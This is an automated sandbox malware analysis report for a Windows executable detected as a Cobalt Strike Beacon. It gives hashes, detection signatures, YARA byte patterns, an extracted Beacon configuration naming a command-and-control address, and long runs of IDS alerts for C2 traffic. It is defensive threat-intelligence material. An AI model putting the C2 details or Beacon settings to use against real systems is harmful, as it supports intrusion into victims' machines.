Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1583283
MD5:9afad044f9ff1201826fb08e602d3e1d
SHA1:e10ffb85d9252ae4067708553ec07141b85e8d58
SHA256:d2f3bf1f985fdd93088380843143d235c55b7188b99d7e728a1c49f8cbeb0a9e
Tags:CobaltStrikeexemalwareuser-Joker
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs new ROOT certificates
Machine Learning detection for sample
Contains functionality to call native functions
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1.exe (PID: 5540 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 9AFAD044F9FF1201826FB08E602D3E1D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 10000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "45.116.78.127,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.3273708088.000002B66A0DC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x187e4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
      • 0xfd75:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
      • 0xff0d:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
      00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        Click to see the 2 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-02T10:34:00.428365+010020287653Unknown Traffic192.168.2.54970445.116.78.127443TCP
        2025-01-02T10:34:09.748404+010020287653Unknown Traffic192.168.2.54970545.116.78.127443TCP
        2025-01-02T10:34:11.637389+010020287653Unknown Traffic192.168.2.54970645.116.78.127443TCP
        2025-01-02T10:34:13.557834+010020287653Unknown Traffic192.168.2.54970745.116.78.127443TCP
        2025-01-02T10:34:15.540284+010020287653Unknown Traffic192.168.2.54970845.116.78.127443TCP
        2025-01-02T10:34:17.647622+010020287653Unknown Traffic192.168.2.54971445.116.78.127443TCP
        2025-01-02T10:34:19.572535+010020287653Unknown Traffic192.168.2.54971745.116.78.127443TCP
        2025-01-02T10:34:21.519447+010020287653Unknown Traffic192.168.2.54972845.116.78.127443TCP
        2025-01-02T10:34:23.397687+010020287653Unknown Traffic192.168.2.54973945.116.78.127443TCP
        2025-01-02T10:34:25.327733+010020287653Unknown Traffic192.168.2.54975545.116.78.127443TCP
        2025-01-02T10:34:27.236320+010020287653Unknown Traffic192.168.2.54976645.116.78.127443TCP
        2025-01-02T10:34:29.151741+010020287653Unknown Traffic192.168.2.54978245.116.78.127443TCP
        2025-01-02T10:34:31.044480+010020287653Unknown Traffic192.168.2.54979445.116.78.127443TCP
        2025-01-02T10:34:32.900275+010020287653Unknown Traffic192.168.2.54980945.116.78.127443TCP
        2025-01-02T10:34:34.809395+010020287653Unknown Traffic192.168.2.54982245.116.78.127443TCP
        2025-01-02T10:34:36.675522+010020287653Unknown Traffic192.168.2.54983645.116.78.127443TCP
        2025-01-02T10:34:38.585436+010020287653Unknown Traffic192.168.2.54984945.116.78.127443TCP
        2025-01-02T10:34:40.544573+010020287653Unknown Traffic192.168.2.54986345.116.78.127443TCP
        2025-01-02T10:34:42.434575+010020287653Unknown Traffic192.168.2.54987845.116.78.127443TCP
        2025-01-02T10:34:44.430146+010020287653Unknown Traffic192.168.2.54989045.116.78.127443TCP
        2025-01-02T10:34:46.361190+010020287653Unknown Traffic192.168.2.54990645.116.78.127443TCP
        2025-01-02T10:34:48.315748+010020287653Unknown Traffic192.168.2.54991845.116.78.127443TCP
        2025-01-02T10:34:50.274161+010020287653Unknown Traffic192.168.2.54993345.116.78.127443TCP
        2025-01-02T10:34:52.701561+010020287653Unknown Traffic192.168.2.54994545.116.78.127443TCP
        2025-01-02T10:34:54.643270+010020287653Unknown Traffic192.168.2.54996245.116.78.127443TCP
        2025-01-02T10:34:56.589408+010020287653Unknown Traffic192.168.2.54997845.116.78.127443TCP
        2025-01-02T10:34:58.519753+010020287653Unknown Traffic192.168.2.54998945.116.78.127443TCP
        2025-01-02T10:35:00.428509+010020287653Unknown Traffic192.168.2.55000345.116.78.127443TCP
        2025-01-02T10:35:02.397660+010020287653Unknown Traffic192.168.2.55000445.116.78.127443TCP
        2025-01-02T10:35:04.283634+010020287653Unknown Traffic192.168.2.55000545.116.78.127443TCP
        2025-01-02T10:35:06.243736+010020287653Unknown Traffic192.168.2.55000645.116.78.127443TCP
        2025-01-02T10:35:08.085295+010020287653Unknown Traffic192.168.2.55000745.116.78.127443TCP
        2025-01-02T10:35:09.896562+010020287653Unknown Traffic192.168.2.55000845.116.78.127443TCP
        2025-01-02T10:35:11.765317+010020287653Unknown Traffic192.168.2.55000945.116.78.127443TCP
        2025-01-02T10:35:13.334887+010020287653Unknown Traffic192.168.2.55001045.116.78.127443TCP
        2025-01-02T10:35:15.081504+010020287653Unknown Traffic192.168.2.55001145.116.78.127443TCP
        2025-01-02T10:35:17.044023+010020287653Unknown Traffic192.168.2.55001245.116.78.127443TCP
        2025-01-02T10:35:19.139603+010020287653Unknown Traffic192.168.2.55001345.116.78.127443TCP
        2025-01-02T10:35:21.913780+010020287653Unknown Traffic192.168.2.55001445.116.78.127443TCP
        2025-01-02T10:35:23.901675+010020287653Unknown Traffic192.168.2.55001545.116.78.127443TCP
        2025-01-02T10:35:25.816225+010020287653Unknown Traffic192.168.2.55001645.116.78.127443TCP
        2025-01-02T10:35:27.731440+010020287653Unknown Traffic192.168.2.55001745.116.78.127443TCP
        2025-01-02T10:35:29.605768+010020287653Unknown Traffic192.168.2.55001845.116.78.127443TCP
        2025-01-02T10:35:31.486285+010020287653Unknown Traffic192.168.2.55001945.116.78.127443TCP
        2025-01-02T10:35:34.183638+010020287653Unknown Traffic192.168.2.55002045.116.78.127443TCP
        2025-01-02T10:35:36.097843+010020287653Unknown Traffic192.168.2.55002145.116.78.127443TCP
        2025-01-02T10:35:38.162854+010020287653Unknown Traffic192.168.2.55002245.116.78.127443TCP
        2025-01-02T10:35:39.937789+010020287653Unknown Traffic192.168.2.55002345.116.78.127443TCP
        2025-01-02T10:35:41.839749+010020287653Unknown Traffic192.168.2.55002445.116.78.127443TCP
        2025-01-02T10:35:43.792569+010020287653Unknown Traffic192.168.2.55002545.116.78.127443TCP
        2025-01-02T10:35:45.480638+010020287653Unknown Traffic192.168.2.55002645.116.78.127443TCP
        2025-01-02T10:35:47.399653+010020287653Unknown Traffic192.168.2.55002745.116.78.127443TCP
        2025-01-02T10:35:49.391791+010020287653Unknown Traffic192.168.2.55002845.116.78.127443TCP
        2025-01-02T10:35:51.318409+010020287653Unknown Traffic192.168.2.55002945.116.78.127443TCP
        2025-01-02T10:35:53.183655+010020287653Unknown Traffic192.168.2.55003045.116.78.127443TCP
        2025-01-02T10:35:55.109773+010020287653Unknown Traffic192.168.2.55003145.116.78.127443TCP
        2025-01-02T10:35:57.023569+010020287653Unknown Traffic192.168.2.55003245.116.78.127443TCP
        2025-01-02T10:35:58.954272+010020287653Unknown Traffic192.168.2.55003345.116.78.127443TCP
        2025-01-02T10:36:00.904156+010020287653Unknown Traffic192.168.2.55003445.116.78.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-02T10:34:01.092715+010020339281A Network Trojan was detected192.168.2.54970445.116.78.127443TCP
        2025-01-02T10:34:10.434039+010020339281A Network Trojan was detected192.168.2.54970545.116.78.127443TCP
        2025-01-02T10:34:12.343974+010020339281A Network Trojan was detected192.168.2.54970645.116.78.127443TCP
        2025-01-02T10:34:14.238635+010020339281A Network Trojan was detected192.168.2.54970745.116.78.127443TCP
        2025-01-02T10:34:16.239468+010020339281A Network Trojan was detected192.168.2.54970845.116.78.127443TCP
        2025-01-02T10:34:18.316328+010020339281A Network Trojan was detected192.168.2.54971445.116.78.127443TCP
        2025-01-02T10:34:20.255143+010020339281A Network Trojan was detected192.168.2.54971745.116.78.127443TCP
        2025-01-02T10:34:22.192772+010020339281A Network Trojan was detected192.168.2.54972845.116.78.127443TCP
        2025-01-02T10:34:24.107141+010020339281A Network Trojan was detected192.168.2.54973945.116.78.127443TCP
        2025-01-02T10:34:26.034082+010020339281A Network Trojan was detected192.168.2.54975545.116.78.127443TCP
        2025-01-02T10:34:27.937620+010020339281A Network Trojan was detected192.168.2.54976645.116.78.127443TCP
        2025-01-02T10:34:29.816572+010020339281A Network Trojan was detected192.168.2.54978245.116.78.127443TCP
        2025-01-02T10:34:31.706974+010020339281A Network Trojan was detected192.168.2.54979445.116.78.127443TCP
        2025-01-02T10:34:33.555179+010020339281A Network Trojan was detected192.168.2.54980945.116.78.127443TCP
        2025-01-02T10:34:35.465882+010020339281A Network Trojan was detected192.168.2.54982245.116.78.127443TCP
        2025-01-02T10:34:37.338965+010020339281A Network Trojan was detected192.168.2.54983645.116.78.127443TCP
        2025-01-02T10:34:39.287641+010020339281A Network Trojan was detected192.168.2.54984945.116.78.127443TCP
        2025-01-02T10:34:41.211719+010020339281A Network Trojan was detected192.168.2.54986345.116.78.127443TCP
        2025-01-02T10:34:43.153663+010020339281A Network Trojan was detected192.168.2.54987845.116.78.127443TCP
        2025-01-02T10:34:45.134788+010020339281A Network Trojan was detected192.168.2.54989045.116.78.127443TCP
        2025-01-02T10:34:47.129666+010020339281A Network Trojan was detected192.168.2.54990645.116.78.127443TCP
        2025-01-02T10:34:48.979834+010020339281A Network Trojan was detected192.168.2.54991845.116.78.127443TCP
        2025-01-02T10:34:50.944422+010020339281A Network Trojan was detected192.168.2.54993345.116.78.127443TCP
        2025-01-02T10:34:53.351892+010020339281A Network Trojan was detected192.168.2.54994545.116.78.127443TCP
        2025-01-02T10:34:55.316109+010020339281A Network Trojan was detected192.168.2.54996245.116.78.127443TCP
        2025-01-02T10:34:57.256975+010020339281A Network Trojan was detected192.168.2.54997845.116.78.127443TCP
        2025-01-02T10:34:59.189687+010020339281A Network Trojan was detected192.168.2.54998945.116.78.127443TCP
        2025-01-02T10:35:01.105692+010020339281A Network Trojan was detected192.168.2.55000345.116.78.127443TCP
        2025-01-02T10:35:03.061089+010020339281A Network Trojan was detected192.168.2.55000445.116.78.127443TCP
        2025-01-02T10:35:04.954043+010020339281A Network Trojan was detected192.168.2.55000545.116.78.127443TCP
        2025-01-02T10:35:06.909697+010020339281A Network Trojan was detected192.168.2.55000645.116.78.127443TCP
        2025-01-02T10:35:08.737331+010020339281A Network Trojan was detected192.168.2.55000745.116.78.127443TCP
        2025-01-02T10:35:10.420539+010020339281A Network Trojan was detected192.168.2.55000845.116.78.127443TCP
        2025-01-02T10:35:12.243598+010020339281A Network Trojan was detected192.168.2.55000945.116.78.127443TCP
        2025-01-02T10:35:13.863025+010020339281A Network Trojan was detected192.168.2.55001045.116.78.127443TCP
        2025-01-02T10:35:15.776542+010020339281A Network Trojan was detected192.168.2.55001145.116.78.127443TCP
        2025-01-02T10:35:17.712476+010020339281A Network Trojan was detected192.168.2.55001245.116.78.127443TCP
        2025-01-02T10:35:19.806754+010020339281A Network Trojan was detected192.168.2.55001345.116.78.127443TCP
        2025-01-02T10:35:22.587459+010020339281A Network Trojan was detected192.168.2.55001445.116.78.127443TCP
        2025-01-02T10:35:24.575099+010020339281A Network Trojan was detected192.168.2.55001545.116.78.127443TCP
        2025-01-02T10:35:26.483418+010020339281A Network Trojan was detected192.168.2.55001645.116.78.127443TCP
        2025-01-02T10:35:28.391452+010020339281A Network Trojan was detected192.168.2.55001745.116.78.127443TCP
        2025-01-02T10:35:30.273853+010020339281A Network Trojan was detected192.168.2.55001845.116.78.127443TCP
        2025-01-02T10:35:33.002512+010020339281A Network Trojan was detected192.168.2.55001945.116.78.127443TCP
        2025-01-02T10:35:34.851482+010020339281A Network Trojan was detected192.168.2.55002045.116.78.127443TCP
        2025-01-02T10:35:36.795278+010020339281A Network Trojan was detected192.168.2.55002145.116.78.127443TCP
        2025-01-02T10:35:38.814912+010020339281A Network Trojan was detected192.168.2.55002245.116.78.127443TCP
        2025-01-02T10:35:40.639081+010020339281A Network Trojan was detected192.168.2.55002345.116.78.127443TCP
        2025-01-02T10:35:42.555830+010020339281A Network Trojan was detected192.168.2.55002445.116.78.127443TCP
        2025-01-02T10:35:44.443340+010020339281A Network Trojan was detected192.168.2.55002545.116.78.127443TCP
        2025-01-02T10:35:46.148932+010020339281A Network Trojan was detected192.168.2.55002645.116.78.127443TCP
        2025-01-02T10:35:48.093172+010020339281A Network Trojan was detected192.168.2.55002745.116.78.127443TCP
        2025-01-02T10:35:50.042937+010020339281A Network Trojan was detected192.168.2.55002845.116.78.127443TCP
        2025-01-02T10:35:51.989380+010020339281A Network Trojan was detected192.168.2.55002945.116.78.127443TCP
        2025-01-02T10:35:53.848224+010020339281A Network Trojan was detected192.168.2.55003045.116.78.127443TCP
        2025-01-02T10:35:55.773488+010020339281A Network Trojan was detected192.168.2.55003145.116.78.127443TCP
        2025-01-02T10:35:57.685330+010020339281A Network Trojan was detected192.168.2.55003245.116.78.127443TCP
        2025-01-02T10:35:59.670152+010020339281A Network Trojan was detected192.168.2.55003345.116.78.127443TCP
        2025-01-02T10:36:01.621895+010020339281A Network Trojan was detected192.168.2.55003445.116.78.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-02T10:34:01.092715+010020336581Malware Command and Control Activity Detected192.168.2.54970445.116.78.127443TCP
        2025-01-02T10:34:10.434039+010020336581Malware Command and Control Activity Detected192.168.2.54970545.116.78.127443TCP
        2025-01-02T10:34:12.343974+010020336581Malware Command and Control Activity Detected192.168.2.54970645.116.78.127443TCP
        2025-01-02T10:34:14.238635+010020336581Malware Command and Control Activity Detected192.168.2.54970745.116.78.127443TCP
        2025-01-02T10:34:16.239468+010020336581Malware Command and Control Activity Detected192.168.2.54970845.116.78.127443TCP
        2025-01-02T10:34:18.316328+010020336581Malware Command and Control Activity Detected192.168.2.54971445.116.78.127443TCP
        2025-01-02T10:34:20.255143+010020336581Malware Command and Control Activity Detected192.168.2.54971745.116.78.127443TCP
        2025-01-02T10:34:22.192772+010020336581Malware Command and Control Activity Detected192.168.2.54972845.116.78.127443TCP
        2025-01-02T10:34:24.107141+010020336581Malware Command and Control Activity Detected192.168.2.54973945.116.78.127443TCP
        2025-01-02T10:34:26.034082+010020336581Malware Command and Control Activity Detected192.168.2.54975545.116.78.127443TCP
        2025-01-02T10:34:27.937620+010020336581Malware Command and Control Activity Detected192.168.2.54976645.116.78.127443TCP
        2025-01-02T10:34:29.816572+010020336581Malware Command and Control Activity Detected192.168.2.54978245.116.78.127443TCP
        2025-01-02T10:34:31.706974+010020336581Malware Command and Control Activity Detected192.168.2.54979445.116.78.127443TCP
        2025-01-02T10:34:33.555179+010020336581Malware Command and Control Activity Detected192.168.2.54980945.116.78.127443TCP
        2025-01-02T10:34:35.465882+010020336581Malware Command and Control Activity Detected192.168.2.54982245.116.78.127443TCP
        2025-01-02T10:34:37.338965+010020336581Malware Command and Control Activity Detected192.168.2.54983645.116.78.127443TCP
        2025-01-02T10:34:39.287641+010020336581Malware Command and Control Activity Detected192.168.2.54984945.116.78.127443TCP
        2025-01-02T10:34:41.211719+010020336581Malware Command and Control Activity Detected192.168.2.54986345.116.78.127443TCP
        2025-01-02T10:34:43.153663+010020336581Malware Command and Control Activity Detected192.168.2.54987845.116.78.127443TCP
        2025-01-02T10:34:45.134788+010020336581Malware Command and Control Activity Detected192.168.2.54989045.116.78.127443TCP
        2025-01-02T10:34:47.129666+010020336581Malware Command and Control Activity Detected192.168.2.54990645.116.78.127443TCP
        2025-01-02T10:34:48.979834+010020336581Malware Command and Control Activity Detected192.168.2.54991845.116.78.127443TCP
        2025-01-02T10:34:50.944422+010020336581Malware Command and Control Activity Detected192.168.2.54993345.116.78.127443TCP
        2025-01-02T10:34:53.351892+010020336581Malware Command and Control Activity Detected192.168.2.54994545.116.78.127443TCP
        2025-01-02T10:34:55.316109+010020336581Malware Command and Control Activity Detected192.168.2.54996245.116.78.127443TCP
        2025-01-02T10:34:57.256975+010020336581Malware Command and Control Activity Detected192.168.2.54997845.116.78.127443TCP
        2025-01-02T10:34:59.189687+010020336581Malware Command and Control Activity Detected192.168.2.54998945.116.78.127443TCP
        2025-01-02T10:35:01.105692+010020336581Malware Command and Control Activity Detected192.168.2.55000345.116.78.127443TCP
        2025-01-02T10:35:03.061089+010020336581Malware Command and Control Activity Detected192.168.2.55000445.116.78.127443TCP
        2025-01-02T10:35:04.954043+010020336581Malware Command and Control Activity Detected192.168.2.55000545.116.78.127443TCP
        2025-01-02T10:35:06.909697+010020336581Malware Command and Control Activity Detected192.168.2.55000645.116.78.127443TCP
        2025-01-02T10:35:08.737331+010020336581Malware Command and Control Activity Detected192.168.2.55000745.116.78.127443TCP
        2025-01-02T10:35:10.420539+010020336581Malware Command and Control Activity Detected192.168.2.55000845.116.78.127443TCP
        2025-01-02T10:35:12.243598+010020336581Malware Command and Control Activity Detected192.168.2.55000945.116.78.127443TCP
        2025-01-02T10:35:13.863025+010020336581Malware Command and Control Activity Detected192.168.2.55001045.116.78.127443TCP
        2025-01-02T10:35:15.776542+010020336581Malware Command and Control Activity Detected192.168.2.55001145.116.78.127443TCP
        2025-01-02T10:35:17.712476+010020336581Malware Command and Control Activity Detected192.168.2.55001245.116.78.127443TCP
        2025-01-02T10:35:19.806754+010020336581Malware Command and Control Activity Detected192.168.2.55001345.116.78.127443TCP
        2025-01-02T10:35:22.587459+010020336581Malware Command and Control Activity Detected192.168.2.55001445.116.78.127443TCP
        2025-01-02T10:35:24.575099+010020336581Malware Command and Control Activity Detected192.168.2.55001545.116.78.127443TCP
        2025-01-02T10:35:26.483418+010020336581Malware Command and Control Activity Detected192.168.2.55001645.116.78.127443TCP
        2025-01-02T10:35:28.391452+010020336581Malware Command and Control Activity Detected192.168.2.55001745.116.78.127443TCP
        2025-01-02T10:35:30.273853+010020336581Malware Command and Control Activity Detected192.168.2.55001845.116.78.127443TCP
        2025-01-02T10:35:33.002512+010020336581Malware Command and Control Activity Detected192.168.2.55001945.116.78.127443TCP
        2025-01-02T10:35:34.851482+010020336581Malware Command and Control Activity Detected192.168.2.55002045.116.78.127443TCP
        2025-01-02T10:35:36.795278+010020336581Malware Command and Control Activity Detected192.168.2.55002145.116.78.127443TCP
        2025-01-02T10:35:38.814912+010020336581Malware Command and Control Activity Detected192.168.2.55002245.116.78.127443TCP
        2025-01-02T10:35:40.639081+010020336581Malware Command and Control Activity Detected192.168.2.55002345.116.78.127443TCP
        2025-01-02T10:35:42.555830+010020336581Malware Command and Control Activity Detected192.168.2.55002445.116.78.127443TCP
        2025-01-02T10:35:44.443340+010020336581Malware Command and Control Activity Detected192.168.2.55002545.116.78.127443TCP
        2025-01-02T10:35:46.148932+010020336581Malware Command and Control Activity Detected192.168.2.55002645.116.78.127443TCP
        2025-01-02T10:35:48.093172+010020336581Malware Command and Control Activity Detected192.168.2.55002745.116.78.127443TCP
        2025-01-02T10:35:50.042937+010020336581Malware Command and Control Activity Detected192.168.2.55002845.116.78.127443TCP
        2025-01-02T10:35:51.989380+010020336581Malware Command and Control Activity Detected192.168.2.55002945.116.78.127443TCP
        2025-01-02T10:35:53.848224+010020336581Malware Command and Control Activity Detected192.168.2.55003045.116.78.127443TCP
        2025-01-02T10:35:55.773488+010020336581Malware Command and Control Activity Detected192.168.2.55003145.116.78.127443TCP
        2025-01-02T10:35:57.685330+010020336581Malware Command and Control Activity Detected192.168.2.55003245.116.78.127443TCP
        2025-01-02T10:35:59.670152+010020336581Malware Command and Control Activity Detected192.168.2.55003345.116.78.127443TCP
        2025-01-02T10:36:01.621895+010020336581Malware Command and Control Activity Detected192.168.2.55003445.116.78.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-02T10:34:01.092931+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549704TCP
        2025-01-02T10:34:10.436015+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549705TCP
        2025-01-02T10:34:12.344200+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549706TCP
        2025-01-02T10:34:14.239065+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549707TCP
        2025-01-02T10:34:16.239762+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549708TCP
        2025-01-02T10:34:18.324834+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549714TCP
        2025-01-02T10:34:20.256075+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549717TCP
        2025-01-02T10:34:22.193088+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549728TCP
        2025-01-02T10:34:24.112399+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549739TCP
        2025-01-02T10:34:26.034223+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549755TCP
        2025-01-02T10:34:27.938313+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549766TCP
        2025-01-02T10:34:29.816835+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549782TCP
        2025-01-02T10:34:31.707424+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549794TCP
        2025-01-02T10:34:33.555591+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549809TCP
        2025-01-02T10:34:35.466219+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549822TCP
        2025-01-02T10:34:37.345373+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549836TCP
        2025-01-02T10:34:39.289599+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549849TCP
        2025-01-02T10:34:41.212082+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549863TCP
        2025-01-02T10:34:43.153994+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549878TCP
        2025-01-02T10:34:45.135478+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549890TCP
        2025-01-02T10:34:47.135266+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549906TCP
        2025-01-02T10:34:48.988027+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549918TCP
        2025-01-02T10:34:50.944662+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549933TCP
        2025-01-02T10:34:53.352483+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549945TCP
        2025-01-02T10:34:55.317666+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549962TCP
        2025-01-02T10:34:57.258298+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549978TCP
        2025-01-02T10:34:59.190054+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.549989TCP
        2025-01-02T10:35:01.106608+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550003TCP
        2025-01-02T10:35:03.065114+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550004TCP
        2025-01-02T10:35:04.954891+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550005TCP
        2025-01-02T10:35:06.910071+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550006TCP
        2025-01-02T10:35:08.737598+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550007TCP
        2025-01-02T10:35:10.428495+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550008TCP
        2025-01-02T10:35:12.244025+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550009TCP
        2025-01-02T10:35:13.868644+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550010TCP
        2025-01-02T10:35:15.776816+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550011TCP
        2025-01-02T10:35:17.712836+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550012TCP
        2025-01-02T10:35:20.575136+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550013TCP
        2025-01-02T10:35:22.601054+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550014TCP
        2025-01-02T10:35:24.575376+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550015TCP
        2025-01-02T10:35:26.490360+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550016TCP
        2025-01-02T10:35:28.391743+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550017TCP
        2025-01-02T10:35:30.280709+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550018TCP
        2025-01-02T10:35:33.002755+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550019TCP
        2025-01-02T10:35:34.851723+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550020TCP
        2025-01-02T10:35:36.800172+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550021TCP
        2025-01-02T10:35:38.815252+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550022TCP
        2025-01-02T10:35:40.639319+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550023TCP
        2025-01-02T10:35:42.556071+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550024TCP
        2025-01-02T10:35:44.443519+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550025TCP
        2025-01-02T10:35:46.149196+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550026TCP
        2025-01-02T10:35:48.093491+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550027TCP
        2025-01-02T10:35:50.047585+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550028TCP
